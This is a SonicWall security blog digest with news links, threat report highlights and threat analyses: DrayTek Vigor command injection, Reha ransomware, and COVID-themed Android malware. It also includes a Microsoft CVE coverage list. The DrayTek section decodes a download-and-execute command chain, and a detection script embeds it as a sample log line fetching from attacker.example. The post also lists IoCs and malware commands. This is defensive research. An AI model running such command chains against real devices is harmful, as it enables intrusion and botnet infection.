Cybersecurity News & Trends – 07-24-20

This week, SonicWall reveals what the “new business normal” looks like for cybercriminals in the mid-year update to the 2020 Cyber Threat Report.


SonicWall Spotlight

SonicWall Report: COVID-19 Has Created ‘Boon’ For Criminals — ZDNet

  • In an article on SonicWall’s Mid-Year Threat Report, ZDNet highlights findings that hackers have shifted their strategies due to COVID-19.

The 2020 Rising Female Stars Of The IT Channel — CRN

  • SonicWall is proud to announce one of its own, Tiffany Haselhorst, has joined other leaders within the IT channel community on CRN’s esteemed 2020 list of 100 Rising Female Stars.

Cyberthreat landscape changes to meet new business normal of Work From Home: SonicWall — Channelbuzz.ca

  • In an article on SonicWall’s Mid-Year Threat Report, Channelbuzz highlights how cybercriminals have evolved their tactics to better exploit remote work environments during the pandemic.

Malware Attacks Down As Ransomware Increases — BetaNews

  • In an article on SonicWall’s Mid-Year Threat Report, BetaNews highlights findings that malware has dropped 24% and ransomware has increased 20% globally and 109% in the U.S.

Cybersecurity News

Using Robust Tools, Cybercriminals Accelerate Their Own Digital Transformation — SiliconANGLE

  • In the online underground, crime not only pays, but attackers are rapidly developing tools and networks that rival those of legitimate enterprises today.

Blackbaud Hack: Universities lose data to ransomware attack — BBC

  • At least seven universities in the UK and Canada have had student data stolen after hackers attacked a cloud computing provider.

Ongoing Meow attack has nuked >1,000 databases without telling anyone why — Ars Technica

  • Just hours after a world-readable database exposed a wealth of sensitive user information, UFO made the news again, this time because a database that stored user details was destroyed in an attack.

Apple’s Hackable iPhones Are Finally Here — Wired

  • Last year, Apple announced a special device just for hackers. The phone — for approved researchers only — will soon go into circulation.

New cryptojacking botnet uses SMB exploit to spread to Windows systems — Bleeping Computer

  • A new cryptojacking botnet is spreading across compromised networks via multiple methods that include the EternalBlue exploit for Windows Server Message Block (SMB) communication protocol.

Ransomware attack locked a football club’s turnstiles — ZDNet

  • Cyber criminals are targeting sports teams, leagues and organizational bodies — and in many cases, their attacks are successful, warns the NCSC.

Lazarus hackers deploy ransomware, steal data using MATA malware — Bleeping Computer

  • A recently discovered malware framework, known as MATA and linked to the North Korean-backed Lazarus hacking group, was used in attacks targeting corporate entities from multiple countries.

House-passed defense spending bill includes provision establishing White House cyber czar — The Hill

  • The House version of the annual National Defense Authorization Act included a provision establishing a national cyber director, a role that would help coordinate federal cybersecurity efforts.

Hackers use recycled backdoor to keep a hold on hacked e-commerce server — Ars Technica

  • Easy-to-miss script can give attackers new access should they ever be booted out.

Twitter Hack Revives Concerns Over Its Data Security — The Wall Street Journal

  • The alleged perpetrator, who called himself ‘Kirk,’ was part of a subculture where hackers trade in coveted social-media accounts.

In Case You Missed It

Draytek Vigor Remote Code Execution vulnerability attacks spotted in the wild

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. The Vigor3900 and Vigor2960 are Quad-WAN broadband router/VPN gateway products. The Vigor300B is a Quad-WAN load-balancing broadband router that runs on Linux.

A command-injection vulnerability (CVE-2020-14472) exists in the mainfunction.cgi file on Draytek Vigor3900, Vigor2960 and Vigor300B devices before version 1.5.1.1. It can lead to remote code execution.

SonicWall Capture Labs threat research team has spotted attacks exploiting this vulnerability in the wild.

Following are some examples:

Decoding the URLs

The discussion below provides an analysis of the attack:

IFS is the shell’s Internal Field Separator: the shell treats each character of $IFS as a delimiter. If IFS is not set, the default sequence is <space>, <tab> and <newline>, so in the attack above ${IFS} expands to <space>. This means the attack consists of the following commands:

/bin/sh -c; launches a shell and executes the command string that follows.

cd /tmp; changes the working directory to /tmp.

rm -rf arm7; removes any existing file named arm7.

busybox wget <attacker’s website>; downloads the malicious file (arm7) from the attacker’s domain. BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android and FreeBSD.

chmod 777 arm7; makes the file readable, writable and executable by everyone.

./arm7; executes the downloaded binary, which is potentially malicious.
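The decoding walked through above can be automated for log triage. The following is an added example written for this page, not code from the original analysis or from SonicWall: it percent-decodes a request, expands ${IFS} back into spaces, splits the command chain on “;” and flags the download-and-execute pattern. The access-log format, the parameter name “action”, the host “attacker.example” and the two sample log lines are constructed placeholders, not values taken from the observed attacks.

```python
"""Decode and triage an obfuscated command chain found in a CGI request.

Added example (not from the original analysis). The log format, the
parameter name 'action', the host 'attacker.example' and the sample log
lines are constructed placeholders, not values from observed attacks.
"""
import re
from urllib.parse import unquote, urlsplit

# Stages of the chain described in the analysis. Each stage alone is a weak
# signal; a download paired with chmod or execution is the strong one.
STAGE_PATTERNS = {
    "shell":    re.compile(r"^(/bin/)?(sh|bash|ash)\s+-c\b"),
    "cd_tmp":   re.compile(r"^cd\s+/tmp\b"),
    "cleanup":  re.compile(r"^rm\s+-\S*f\S*\s+\S+"),
    "download": re.compile(r"^(busybox\s+)?(wget|curl|tftp)\b"),
    "chmod":    re.compile(r"^chmod\s+([0-7]*7[0-7]*|\+x)\s+\S+"),
    "execute":  re.compile(r"^\./\S+"),
}

# Constructed access-log lines: one benign request, one obfuscated chain.
SAMPLE_LOGS = [
    '203.0.113.7 - - [20/Jul/2020:10:01:12 +0000] '
    '"GET /cgi-bin/mainfunction.cgi?action=login HTTP/1.1" 200 512',
    '198.51.100.23 - - [20/Jul/2020:10:01:30 +0000] '
    '"GET /cgi-bin/mainfunction.cgi?action=/bin/sh%20-c%20cd${IFS}/tmp;'
    'rm${IFS}-rf${IFS}arm7;busybox${IFS}wget${IFS}http://attacker.example/arm7;'
    'chmod${IFS}777${IFS}arm7;./arm7 HTTP/1.1" 500 0',
]


def deobfuscate(raw: str) -> str:
    """Percent-decode the value and expand $IFS / ${IFS} into single spaces."""
    text = unquote(raw)
    text = re.sub(r"\$\{IFS\}|\$IFS", " ", text)
    return re.sub(r"\s+", " ", text).strip()


def split_chain(command: str) -> list:
    """Break 'sh -c cd /tmp;rm ...' into the individual commands it runs."""
    stages = []
    m = STAGE_PATTERNS["shell"].match(command)
    if m:  # keep the shell wrapper as its own stage, then unwrap the rest
        stages.append(command[:m.end()])
        command = command[m.end():].strip().strip("'\"")
    stages.extend(c.strip() for c in command.split(";") if c.strip())
    return stages


def classify(log_line: str) -> dict:
    """Decode every query parameter of one request and report matched stages."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return {"suspicious": False, "stages": [], "commands": []}
    query = urlsplit(m.group(1)).query
    hits, commands = set(), []
    # Split pairs manually: parse_qsl on older Pythons also splits on ';',
    # which would destroy the very chain we are trying to recover.
    for pair in query.split("&"):
        _key, _, value = pair.partition("=")
        for cmd in split_chain(deobfuscate(value)):
            commands.append(cmd)
            hits.update(name for name, pat in STAGE_PATTERNS.items() if pat.match(cmd))
    suspicious = "download" in hits and bool({"execute", "chmod"} & hits)
    return {"suspicious": suspicious, "stages": sorted(hits), "commands": commands}


def scan(lines) -> list:
    """Return (source_ip, verdict) for every log line that was flagged."""
    flagged = []
    for line in lines:
        verdict = classify(line)
        if verdict["suspicious"]:
            flagged.append((line.split(" ", 1)[0], verdict))
    return flagged


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOGS):
        print(f"{ip}: stages={verdict['stages']}")
        for cmd in verdict["commands"]:
            print("   ", cmd)
```

Running the script prints the decoded six-command chain for the second sample line only; the benign login request produces no stage matches. Because the match is made on the decoded chain rather than on the raw request bytes, the same logic still fires when the separator is percent-encoded (%24%7BIFS%7D) instead of written literally.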

A quick check on Shodan reveals a number of vulnerable devices.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15089:Draytek Vigor Remote Code Execution

IoCs
192.3.45.185
1.203.161.58
100.33.144.84
100.38.122.182
101.108.97.145
102.66.104.204
103.209.1.230
103.238.200.62
103.4.65.78
103.55.91.146
109.237.147.16
115.133.81.181
115.85.32.210
117.6.168.102
118.70.133.196
118.70.190.137
121.32.151.178
122.176.27.17
123.24.205.232
134.19.215.196
134.90.254.172
145.220.25.28

Reha ransomware targeting Arabic speaking countries.

The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild.

The Reha ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

The ransomware targets Arabic-speaking countries and is designed for a very specific region.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < .Try2Cry >
    • %App.path%\ [Name]. < .txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all files with the following extensions and appends the [Try2Cry] extension onto each encrypted file’s filename.

*.doc,*.ppt,*.jpg,*.xls,*.pdf,*.docx,*.pptx,*.xlsx

During our analysis, we have noticed the malware using a packer called DNSgaurd to avoid detection by sandboxes in the wild.

This makes it harder for us to create a decryptor tool for this ransomware.

However, with some dynamic techniques we were able to inject our tool into the ransomware process and extract some valuable data that proves this is ransomware.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.


Translated to English:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: REHA.RSM (Trojan)
  • GAV: Invader.H_176 (Trojan)
  • GAV: Pitit.A (Trojan)


This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

New Cyber Threat Intelligence Finds Malicious Office Files Spiking, Ransomware Up during COVID-19 Pandemic

Explore the Mid-Year Update to the 2020 SonicWall Cyber Threat Report

With the arrival of the COVID-19 pandemic in the first half of 2020, cybersecurity entered uncharted territory. As organizations worked to connect and secure millions of new remote workers, opportunistic attackers began seizing on the distraction, confusion and lack of preparedness surrounding the pandemic.

We may know how we plan to respond to the “new business normal,” but how are cybercriminals responding? To find out, SonicWall Capture Labs threat researchers have been investigating, analyzing and exploring new threat trends, tactics, strategies and attacks.

“This latest cyber threat data shows that cybercriminals continue to morph their tactics to sway the odds in their favor during uncertain times,” said SonicWall President and CEO Bill Conner. “With everyone more remote and mobile than ever before, businesses are highly exposed and the cybercriminal industry is very aware of that.”

To shed some light on what cybercrime’s new business normal looks like, SonicWall Capture Labs threat researchers are sharing exclusive threat intelligence in the mid-year update to the 2020 SonicWall Cyber Threat Report.

Download the exclusive mid-year report to explore the stories, behaviors and trends that are helping shape our new IT reality from the ground up.

COVID-19 the perfect backdrop for chaos.

SonicWall Capture Labs threat researchers found no shortage of cybercriminals leveraging the fear and uncertainty around the COVID-19 pandemic to get the upper hand. COVID-19 sparked malware across all continents in March, pushing the chance an organization would see a malware attack above 35%. SonicWall began seeing attacks, scams and exploits specifically based around COVID-19 on Feb. 4, and has since detailed at least 20 different types of attacks across just about every category.

Malware volume dips again.

In 2019, fresh off the previous year’s all-time record high of 10.52 billion attacks, malware dropped 20%, to 4.8 billion malware attacks. Fortunately, during the first six months of 2020, that trend accelerated. SonicWall recorded 3.2 billion malware attacks in the first half of 2020, a 33% drop compared to the same time period last year.

Ransomware continues to climb.

As malware falls, ransomware appears to be taking up the slack. By comparing the first halves of 2019 and 2020 ransomware data, we see that not only is ransomware rising, it’s also rising faster.

Attacks against non-standard ports reach new highs.

For the first half of 2020, both Q1 and Q2 set records for number of attacks going through non-standard ports. In February, non-standard port attacks reached a record of 26% before climbing to an unprecedented 30% in May. The updated report explains why this is a critical issue for organizations.

Office files leveraged for malicious agenda.

In the first half of 2020, Office files and PDFs made up a third of all new malicious files identified by SonicWall Capture Advanced Threat Protection (ATP). What’s more concerning? Malicious Office files are up a staggering 176% this year.

Cryptojacking is alive and well.

After Coinhive closed in March 2019 and attacks plummeted in the second half of the year, the death of cryptojacking seemed imminent. But readily available alternatives and an increase in the value of cryptocurrencies have pushed cryptojacking in North America far above the levels recorded in the second half of 2019.

IoT attacks spike.

With a massive increase in the number of people working from home, criminals now have a potential back door to corporate networks through employees’ (often poorly secured) home IoT devices. Combined with an increase in the number of IoT devices in use and other factors, this has led to a huge increase in the number of IoT attacks.

SonicWall’s Tiffany Haselhorst Joins 2020 CRN 100 Rising Female Stars List

SonicWall is proud to announce one of its own, Tiffany Haselhorst, joins an esteemed list along with other leaders within the IT channel community. Today, CRN, a brand of The Channel Company, named her to its 2020 list of 100 Rising Female Stars.

“CRN’s 2020 100 Rising Female Stars list honors leaders who are poised to impact the industry for many years. They are accelerating the growth of their companies through excellent direction and innovation in their field,” said Blaine Raddon, CEO of The Channel Company. “The accomplishments of these women are reshaping the IT channel, and we are proud to honor their achievements.”

The 100 Rising Female Stars list is making its debut this year with channel leadership candidates selected by the CRN editorial team. The final honorees are chosen based on their demonstrated leadership, expertise, innovation and ongoing dedication to the IT channel.

This talented group of women contribute to the development and strategies of their organization’s channel partner programs and exude excellence in areas such as partner engagement, program management and marketing.

“Threat intelligence solutions have never been more vital for an organization’s online safety. I look forward to my continued work with partners to ensure they have the answers to the problems their customers seek to fix,” said Tiffany Haselhorst, Senior Sales Manager at SonicWall. “I’m honored to be recognized amongst so many of these women who I know work as equally hard to provide partners with the support, education and tools they need to exceed their goals and achieve success.”

SonicWall is home to the award-winning SecureFirst Partner program designed to help partners build a highly profitable security practice and offers a range of partnership tiers with varied requirements and associated benefits. It includes SonicWall University, a convenient online learning platform designed to help SecureFirst Partner sales representatives, sales engineers and support engineers stay at the forefront of today’s cyber threats and critical cybersecurity solutions.

The 2020 list of 100 Rising Female Stars will be featured in a special July issue of CRN Magazine and online at www.CRN.com/risingstars.

450+ Financial Android apps targeted by a multifaceted malware that uses Covid theme

The SonicWall RTDMI engine recently detected an Android malware sample posing as a COVID information app. It is an all-in-one malware that combines banking trojan, spyware, keylogger and ransomware functionality.

At the time of detection, this malicious file was absent from popular malware search portals such as VirusTotal and ReversingLabs, which indicates the effectiveness of the RTDMI engine.


For an app circulated as a provider of COVID information, the permissions it requests are unwarranted, which makes it suspicious:

(permissions requested)


When the application is launched, a prompt to enable accessibility for “CovidSar2” is shown continuously while malicious code executes behind the scenes. The app hides itself from the app list:


To evade detection from Google’s built-in malware protection, the app asks to disable Google Play Protect:


The app targets 457 applications by their package name. Targeted apps belong to banking, shopping, trading, finance & crypto wallet categories:

(Targeted package names, part 1)


(Targeted package names, part 2)


Technical Analysis:

Checking whether the app is running in a virtual environment:


The app hides its icon from the device which makes it difficult for the user to identify the app responsible for the activity:


Code to disable Google Play Protect:


It fetches information about the applications installed on the victim’s device, which is later encrypted and sent to the C&C server “hxxps://tr3kjnf[.]xyz”:


It also contains code that identifies the app currently in the foreground and fetches a matching overlay page from the server:


Applications that use two-factor authentication for sign-in could be compromised, as the malware is capable of reading incoming messages, including OTPs:


The app stores the list of supported malicious commands in a local configuration file named “set.xml”:


The malware author implemented the following commands to provide these functionalities:

del_sws: Delete incoming/outgoing messages:


gps: Sends victim’s location details:


getNumber: Reads contact numbers from phonebook:


spamSMS: Send spam SMS to numbers specified in the configuration file:


block_notification: Disable notifications from the specified package:


crypt / decrypt: Encrypts/decrypts a file with the RC4 algorithm and adds/removes the “.AnubisCrypt” extension:


htmllocker: Locks the screen and displays a ransom note:


findfiles: Searches for files inside specific folders and sends them to the C&C server:


StartRecordSound: Records device audio and saves it under the current date and time with an “.amr” extension:


SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.


Indicator of Compromise (IOC):

  • 04e16d09eec3a839506e7938516ca26b


Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 07-17-20

This week, between breaches at Twitter, compromise at Citrix and cyberattacks against COVID-19 vaccine manufacturers, the case for a U.S. national cyber director got even stronger.


SonicWall Spotlight

Russian Cyber Espionage Group is Trying to Steal U.S. COVID-19 Vaccine Research — Newsweek International

  • SonicWall CEO and GCHQ advisor Bill Conner said, “Russia happens to be the first country placed in the spotlight, but it was only a matter of time before a nation state resorted to cybercrime to influence or control global healthcare during a time of great need. … [Cyber] criminals tend to follow the money trail, thus putting a massive bounty on anything vaccine-related.”

Cybersecurity News

Honeywell Sees Rise in USB-Borne Malware That Can Cause Major ICS Disruption — Security Week

  • Honeywell says it has seen a significant increase over the past year in USB-borne malware that can cause disruption to industrial control systems.

Malware adds online sandbox detection to evade analysis — Bleeping Computer

  • Malware developers are now using Any.Run malware analysis service in an attempt to prevent their malware from being easily analyzed by researchers.

This botnet has surged back into action spreading a new ransomware campaign via phishing emails — ZDNet

  • There’s been a big jump in Phorpiex botnet activity – but it’s a trojan malware attack that was the most common malware campaign in June.

New AgeLocker Ransomware uses Googler’s utility to encrypt files — Bleeping Computer

  • A new and targeted ransomware named AgeLocker utilizes the ‘Age’ encryption tool created by a Google employee to encrypt victims’ files.

The case for a National Cyber Director — Cyberscoop

  • Although the effects of COVID-19 will last for years, it’s already clear that shifting more activity online has increased our society’s digital dependence even faster than expected.

‘DdoS-For-Hire’ Is Fueling a New Wave of Attacks — Wired

  • Turf wars are heating up over routers that fuel distributed DDoS attacks.

New Mirai Variant Surfaces with Exploits for 9 Vulnerabilities Products — Dark Reading

  • Impacted products include routers, IP cameras, DVRs, and smart TVs.

TrickBot malware mistakenly warns victims that they are infected — Bleeping Computer

  • The notorious TrickBot malware accidentally included a test module that’s warning victims that they are infected and should contact their administrator.

Russian Hackers Blamed for Attacks on Vaccine-Related Targets — The Wall Street Journal

  • U.S. and U.K. government officials said a prominent state-backed Russian hacking group is responsible for ongoing cyberattacks against organizations involved in the development of coronavirus vaccines and other healthcare-related work.

A Brazen Online Attack Targets V.I.P. Twitter Users in a Bitcoin Scam — The New York Times

  • In a major show of force, hackers breached some of the site’s most prominent accounts, a Who’s Who of Americans in politics, entertainment and tech.

Citrix: No breach, hacker stole business info from third party — Bleeping Computer

  • Citrix has published an official statement to deny claims that the company’s network was breached by a malicious actor who says that he was also able to steal customer information.

In Case You Missed It

Malicious Android apps continue to use the Covid theme to spread different types of malware

Android malware with COVID-related themes continues to spread. The SonicWall Capture Labs threat research team has observed different types of Android malware propagated using the COVID-19 theme. This blog highlights some of our findings.


Dialer malware

  • Md5:e3475bc75d6d7225b3313942829f03bc
  • Package name: Mobile.bright
  • Application name: Corona virus


  • Md5: 4afe0e25e60504506a8005b58bdc74f8
  • Package name: com.my.photo.effect
  • Application name: COVID 19 UPDATE NEWS


  • Md5: 4161a3c2f04c60d7425ca0dbf08051d2
  • Package name: corona.virus.checkee
  • Application name: corona virus checker


Malicious dialers often contain hardcoded premium telephone numbers. These dialers work in the background and dial telephone lines at other locations, causing the victims to incur expensive phone bills.

The samples listed above spread using COVID-19-related themes but do not perform the functions advertised. The samples contain hardcoded telephone numbers, as shown below:

Coronavirus stats with suspicious functionalities

  • Md5: 42f2eda86a8fba07a0f389fec0a6e95b
  • Package name: dulcidion.coronainfo
  • Application name: Corona Info

This app presents itself as a live information provider for global Covid-19 related infections. In the background it uses a freely available API to gather the statistics.

Interestingly, this API has been used by both malicious and non-malicious executable and APK applications. This further shows how malicious applications provide relevant information while hiding their malicious content.

This app claims to provide information about Covid-19 infections in different parts of the world. However, it contains a number of suspicious functionalities within its code that look out of place considering what it claims to do:

Checking for root status of the device:

Clipboard functionality:

Checking if vpn is being used:

Checking if an emulator, VirtualBox or Genymotion is being used:


Remote Access Trojans

  • Md5: 6ae422acd978c308e139456d674f719b
  • Package name: dkjfxgcxkumbroynfd.sizqhephspmlculghrpkmnb.bmkfzwiobchswd
  • Application name: COVID-19


  • Md5: 439be2e754cfc5795d1254d8f1bc4241
  • Package name: wfwcjawnldylkf.jlhhtjzefayylrzalmjg.msblgakkhbfpyahkugaezmxrsu
  • Application name: V-Alert COVID-19


Both these apps request accessibility service access after execution and keep showing the request window until access is granted. In the background, the app (md5: 439be2e754cfc5795d1254d8f1bc4241) communicates with a specific Twitter account to receive commands:

The shared_prefs folder contains a file – set.xml which contains a number of supported commands. A few dangerous commands from the list include:

  • keylogger
  • cryptfile
  • spamSMS
  • recordsound
  • vnc_start_new
  • htmllocker
  • textPlayProtect

We have covered a similar Android malware in more detail in one of our previous blogs.

Both apps contain packed code that introduces a number of class files containing junk code. Upon execution, both apps drop a .json file in the app folder; in reality this is a .dex file. This .dex file contains code related to malicious functionalities such as collecting the GPS location and sending SMS messages:


SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Dialer.TL_3 (Trojan)
  • Presnoker.AN (Trojan)
  • Cerberus.BN (Trojan)


Indicators of Compromise (IOCs):

  • 439be2e754cfc5795d1254d8f1bc4241
  • 6ae422acd978c308e139456d674f719b
  • 42f2eda86a8fba07a0f389fec0a6e95b
  • 4161a3c2f04c60d7425ca0dbf08051d2
  • 4afe0e25e60504506a8005b58bdc74f8
  • e3475bc75d6d7225b3313942829f03bc

Microsoft Security Bulletin Coverage for July 2020

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020. A list of the issues reported, along with SonicWall coverage information, follows:

CVE-2020-1147 .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
ASPY 5964:Malformed-File exe.MP.144

CVE-2020-1350 Windows DNS Server Remote Code Execution Vulnerability
IPS 15069:Windows DNS Server Remote Code Execution (CVE-2020-1350)

CVE-2020-1374 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 5966:Malformed-File exe.MP.146

CVE-2020-1381 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5965:Malformed-File exe.MP.145

CVE-2020-1382 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5967:Malformed-File exe.MP.148

CVE-2020-1399 Windows Runtime Elevation of Privilege Vulnerability
ASPY 5968:Malformed-File exe.MP.149

CVE-2020-1403 VBScript Remote Code Execution Vulnerability
IPS 14849:Suspicious JavaScript/VBScript Code 56

CVE-2020-1410 Windows Address Book Remote Code Execution Vulnerability
ASPY 5963:Malformed-File wab.MP.1

CVE-2020-1426 Windows Kernel Information Disclosure Vulnerability
ASPY 5962:Malformed-File exe.MP.147

The following vulnerabilities have no known exploits in the wild:

CVE-2020-1025 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1032 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1036 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1040 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1041 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1042 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1043 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1085 Windows Function Discovery Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1240 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1249 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1267 Local Security Authority Subsystem Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1326 Azure DevOps Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1330 Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1333 Group Policy Services Policy Processing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1336 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1342 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1344 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1346 Windows Modules Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1347 Windows Storage Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1349 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1351 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1352 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1353 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1354 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1355 Windows Font Driver Host Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1356 Windows iSCSI Target Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1357 Windows System Events Broker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1358 Windows Resource Policy Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1359 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1360 Windows Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1361 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1362 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1363 Windows Picker Platform Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1364 Windows WalletService Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1365 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1366 Windows Print Workflow Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1367 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1368 Windows Credential Enrollment Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1369 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1370 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1371 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1372 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1373 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1375 Windows COM Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1384 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1385 Windows Credential Picker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1386 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1387 Windows Push Notification Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1388 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1389 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1390 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1391 Windows Agent Activation Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1392 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1393 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1394 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1395 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1396 Windows ALPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1397 Windows Imaging Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1398 Windows Lockscreen Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1400 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1401 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1402 Windows ActiveX Installer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1404 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1405 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1406 Windows Network List Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1407 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1408 Microsoft Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1409 DirectWrite Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1411 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1412 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1413 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1414 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1415 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1416 Visual Studio and Visual Studio Code Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1418 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1420 Windows Error Reporting Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1421 LNK Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1422 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1423 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1424 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1427 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1428 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
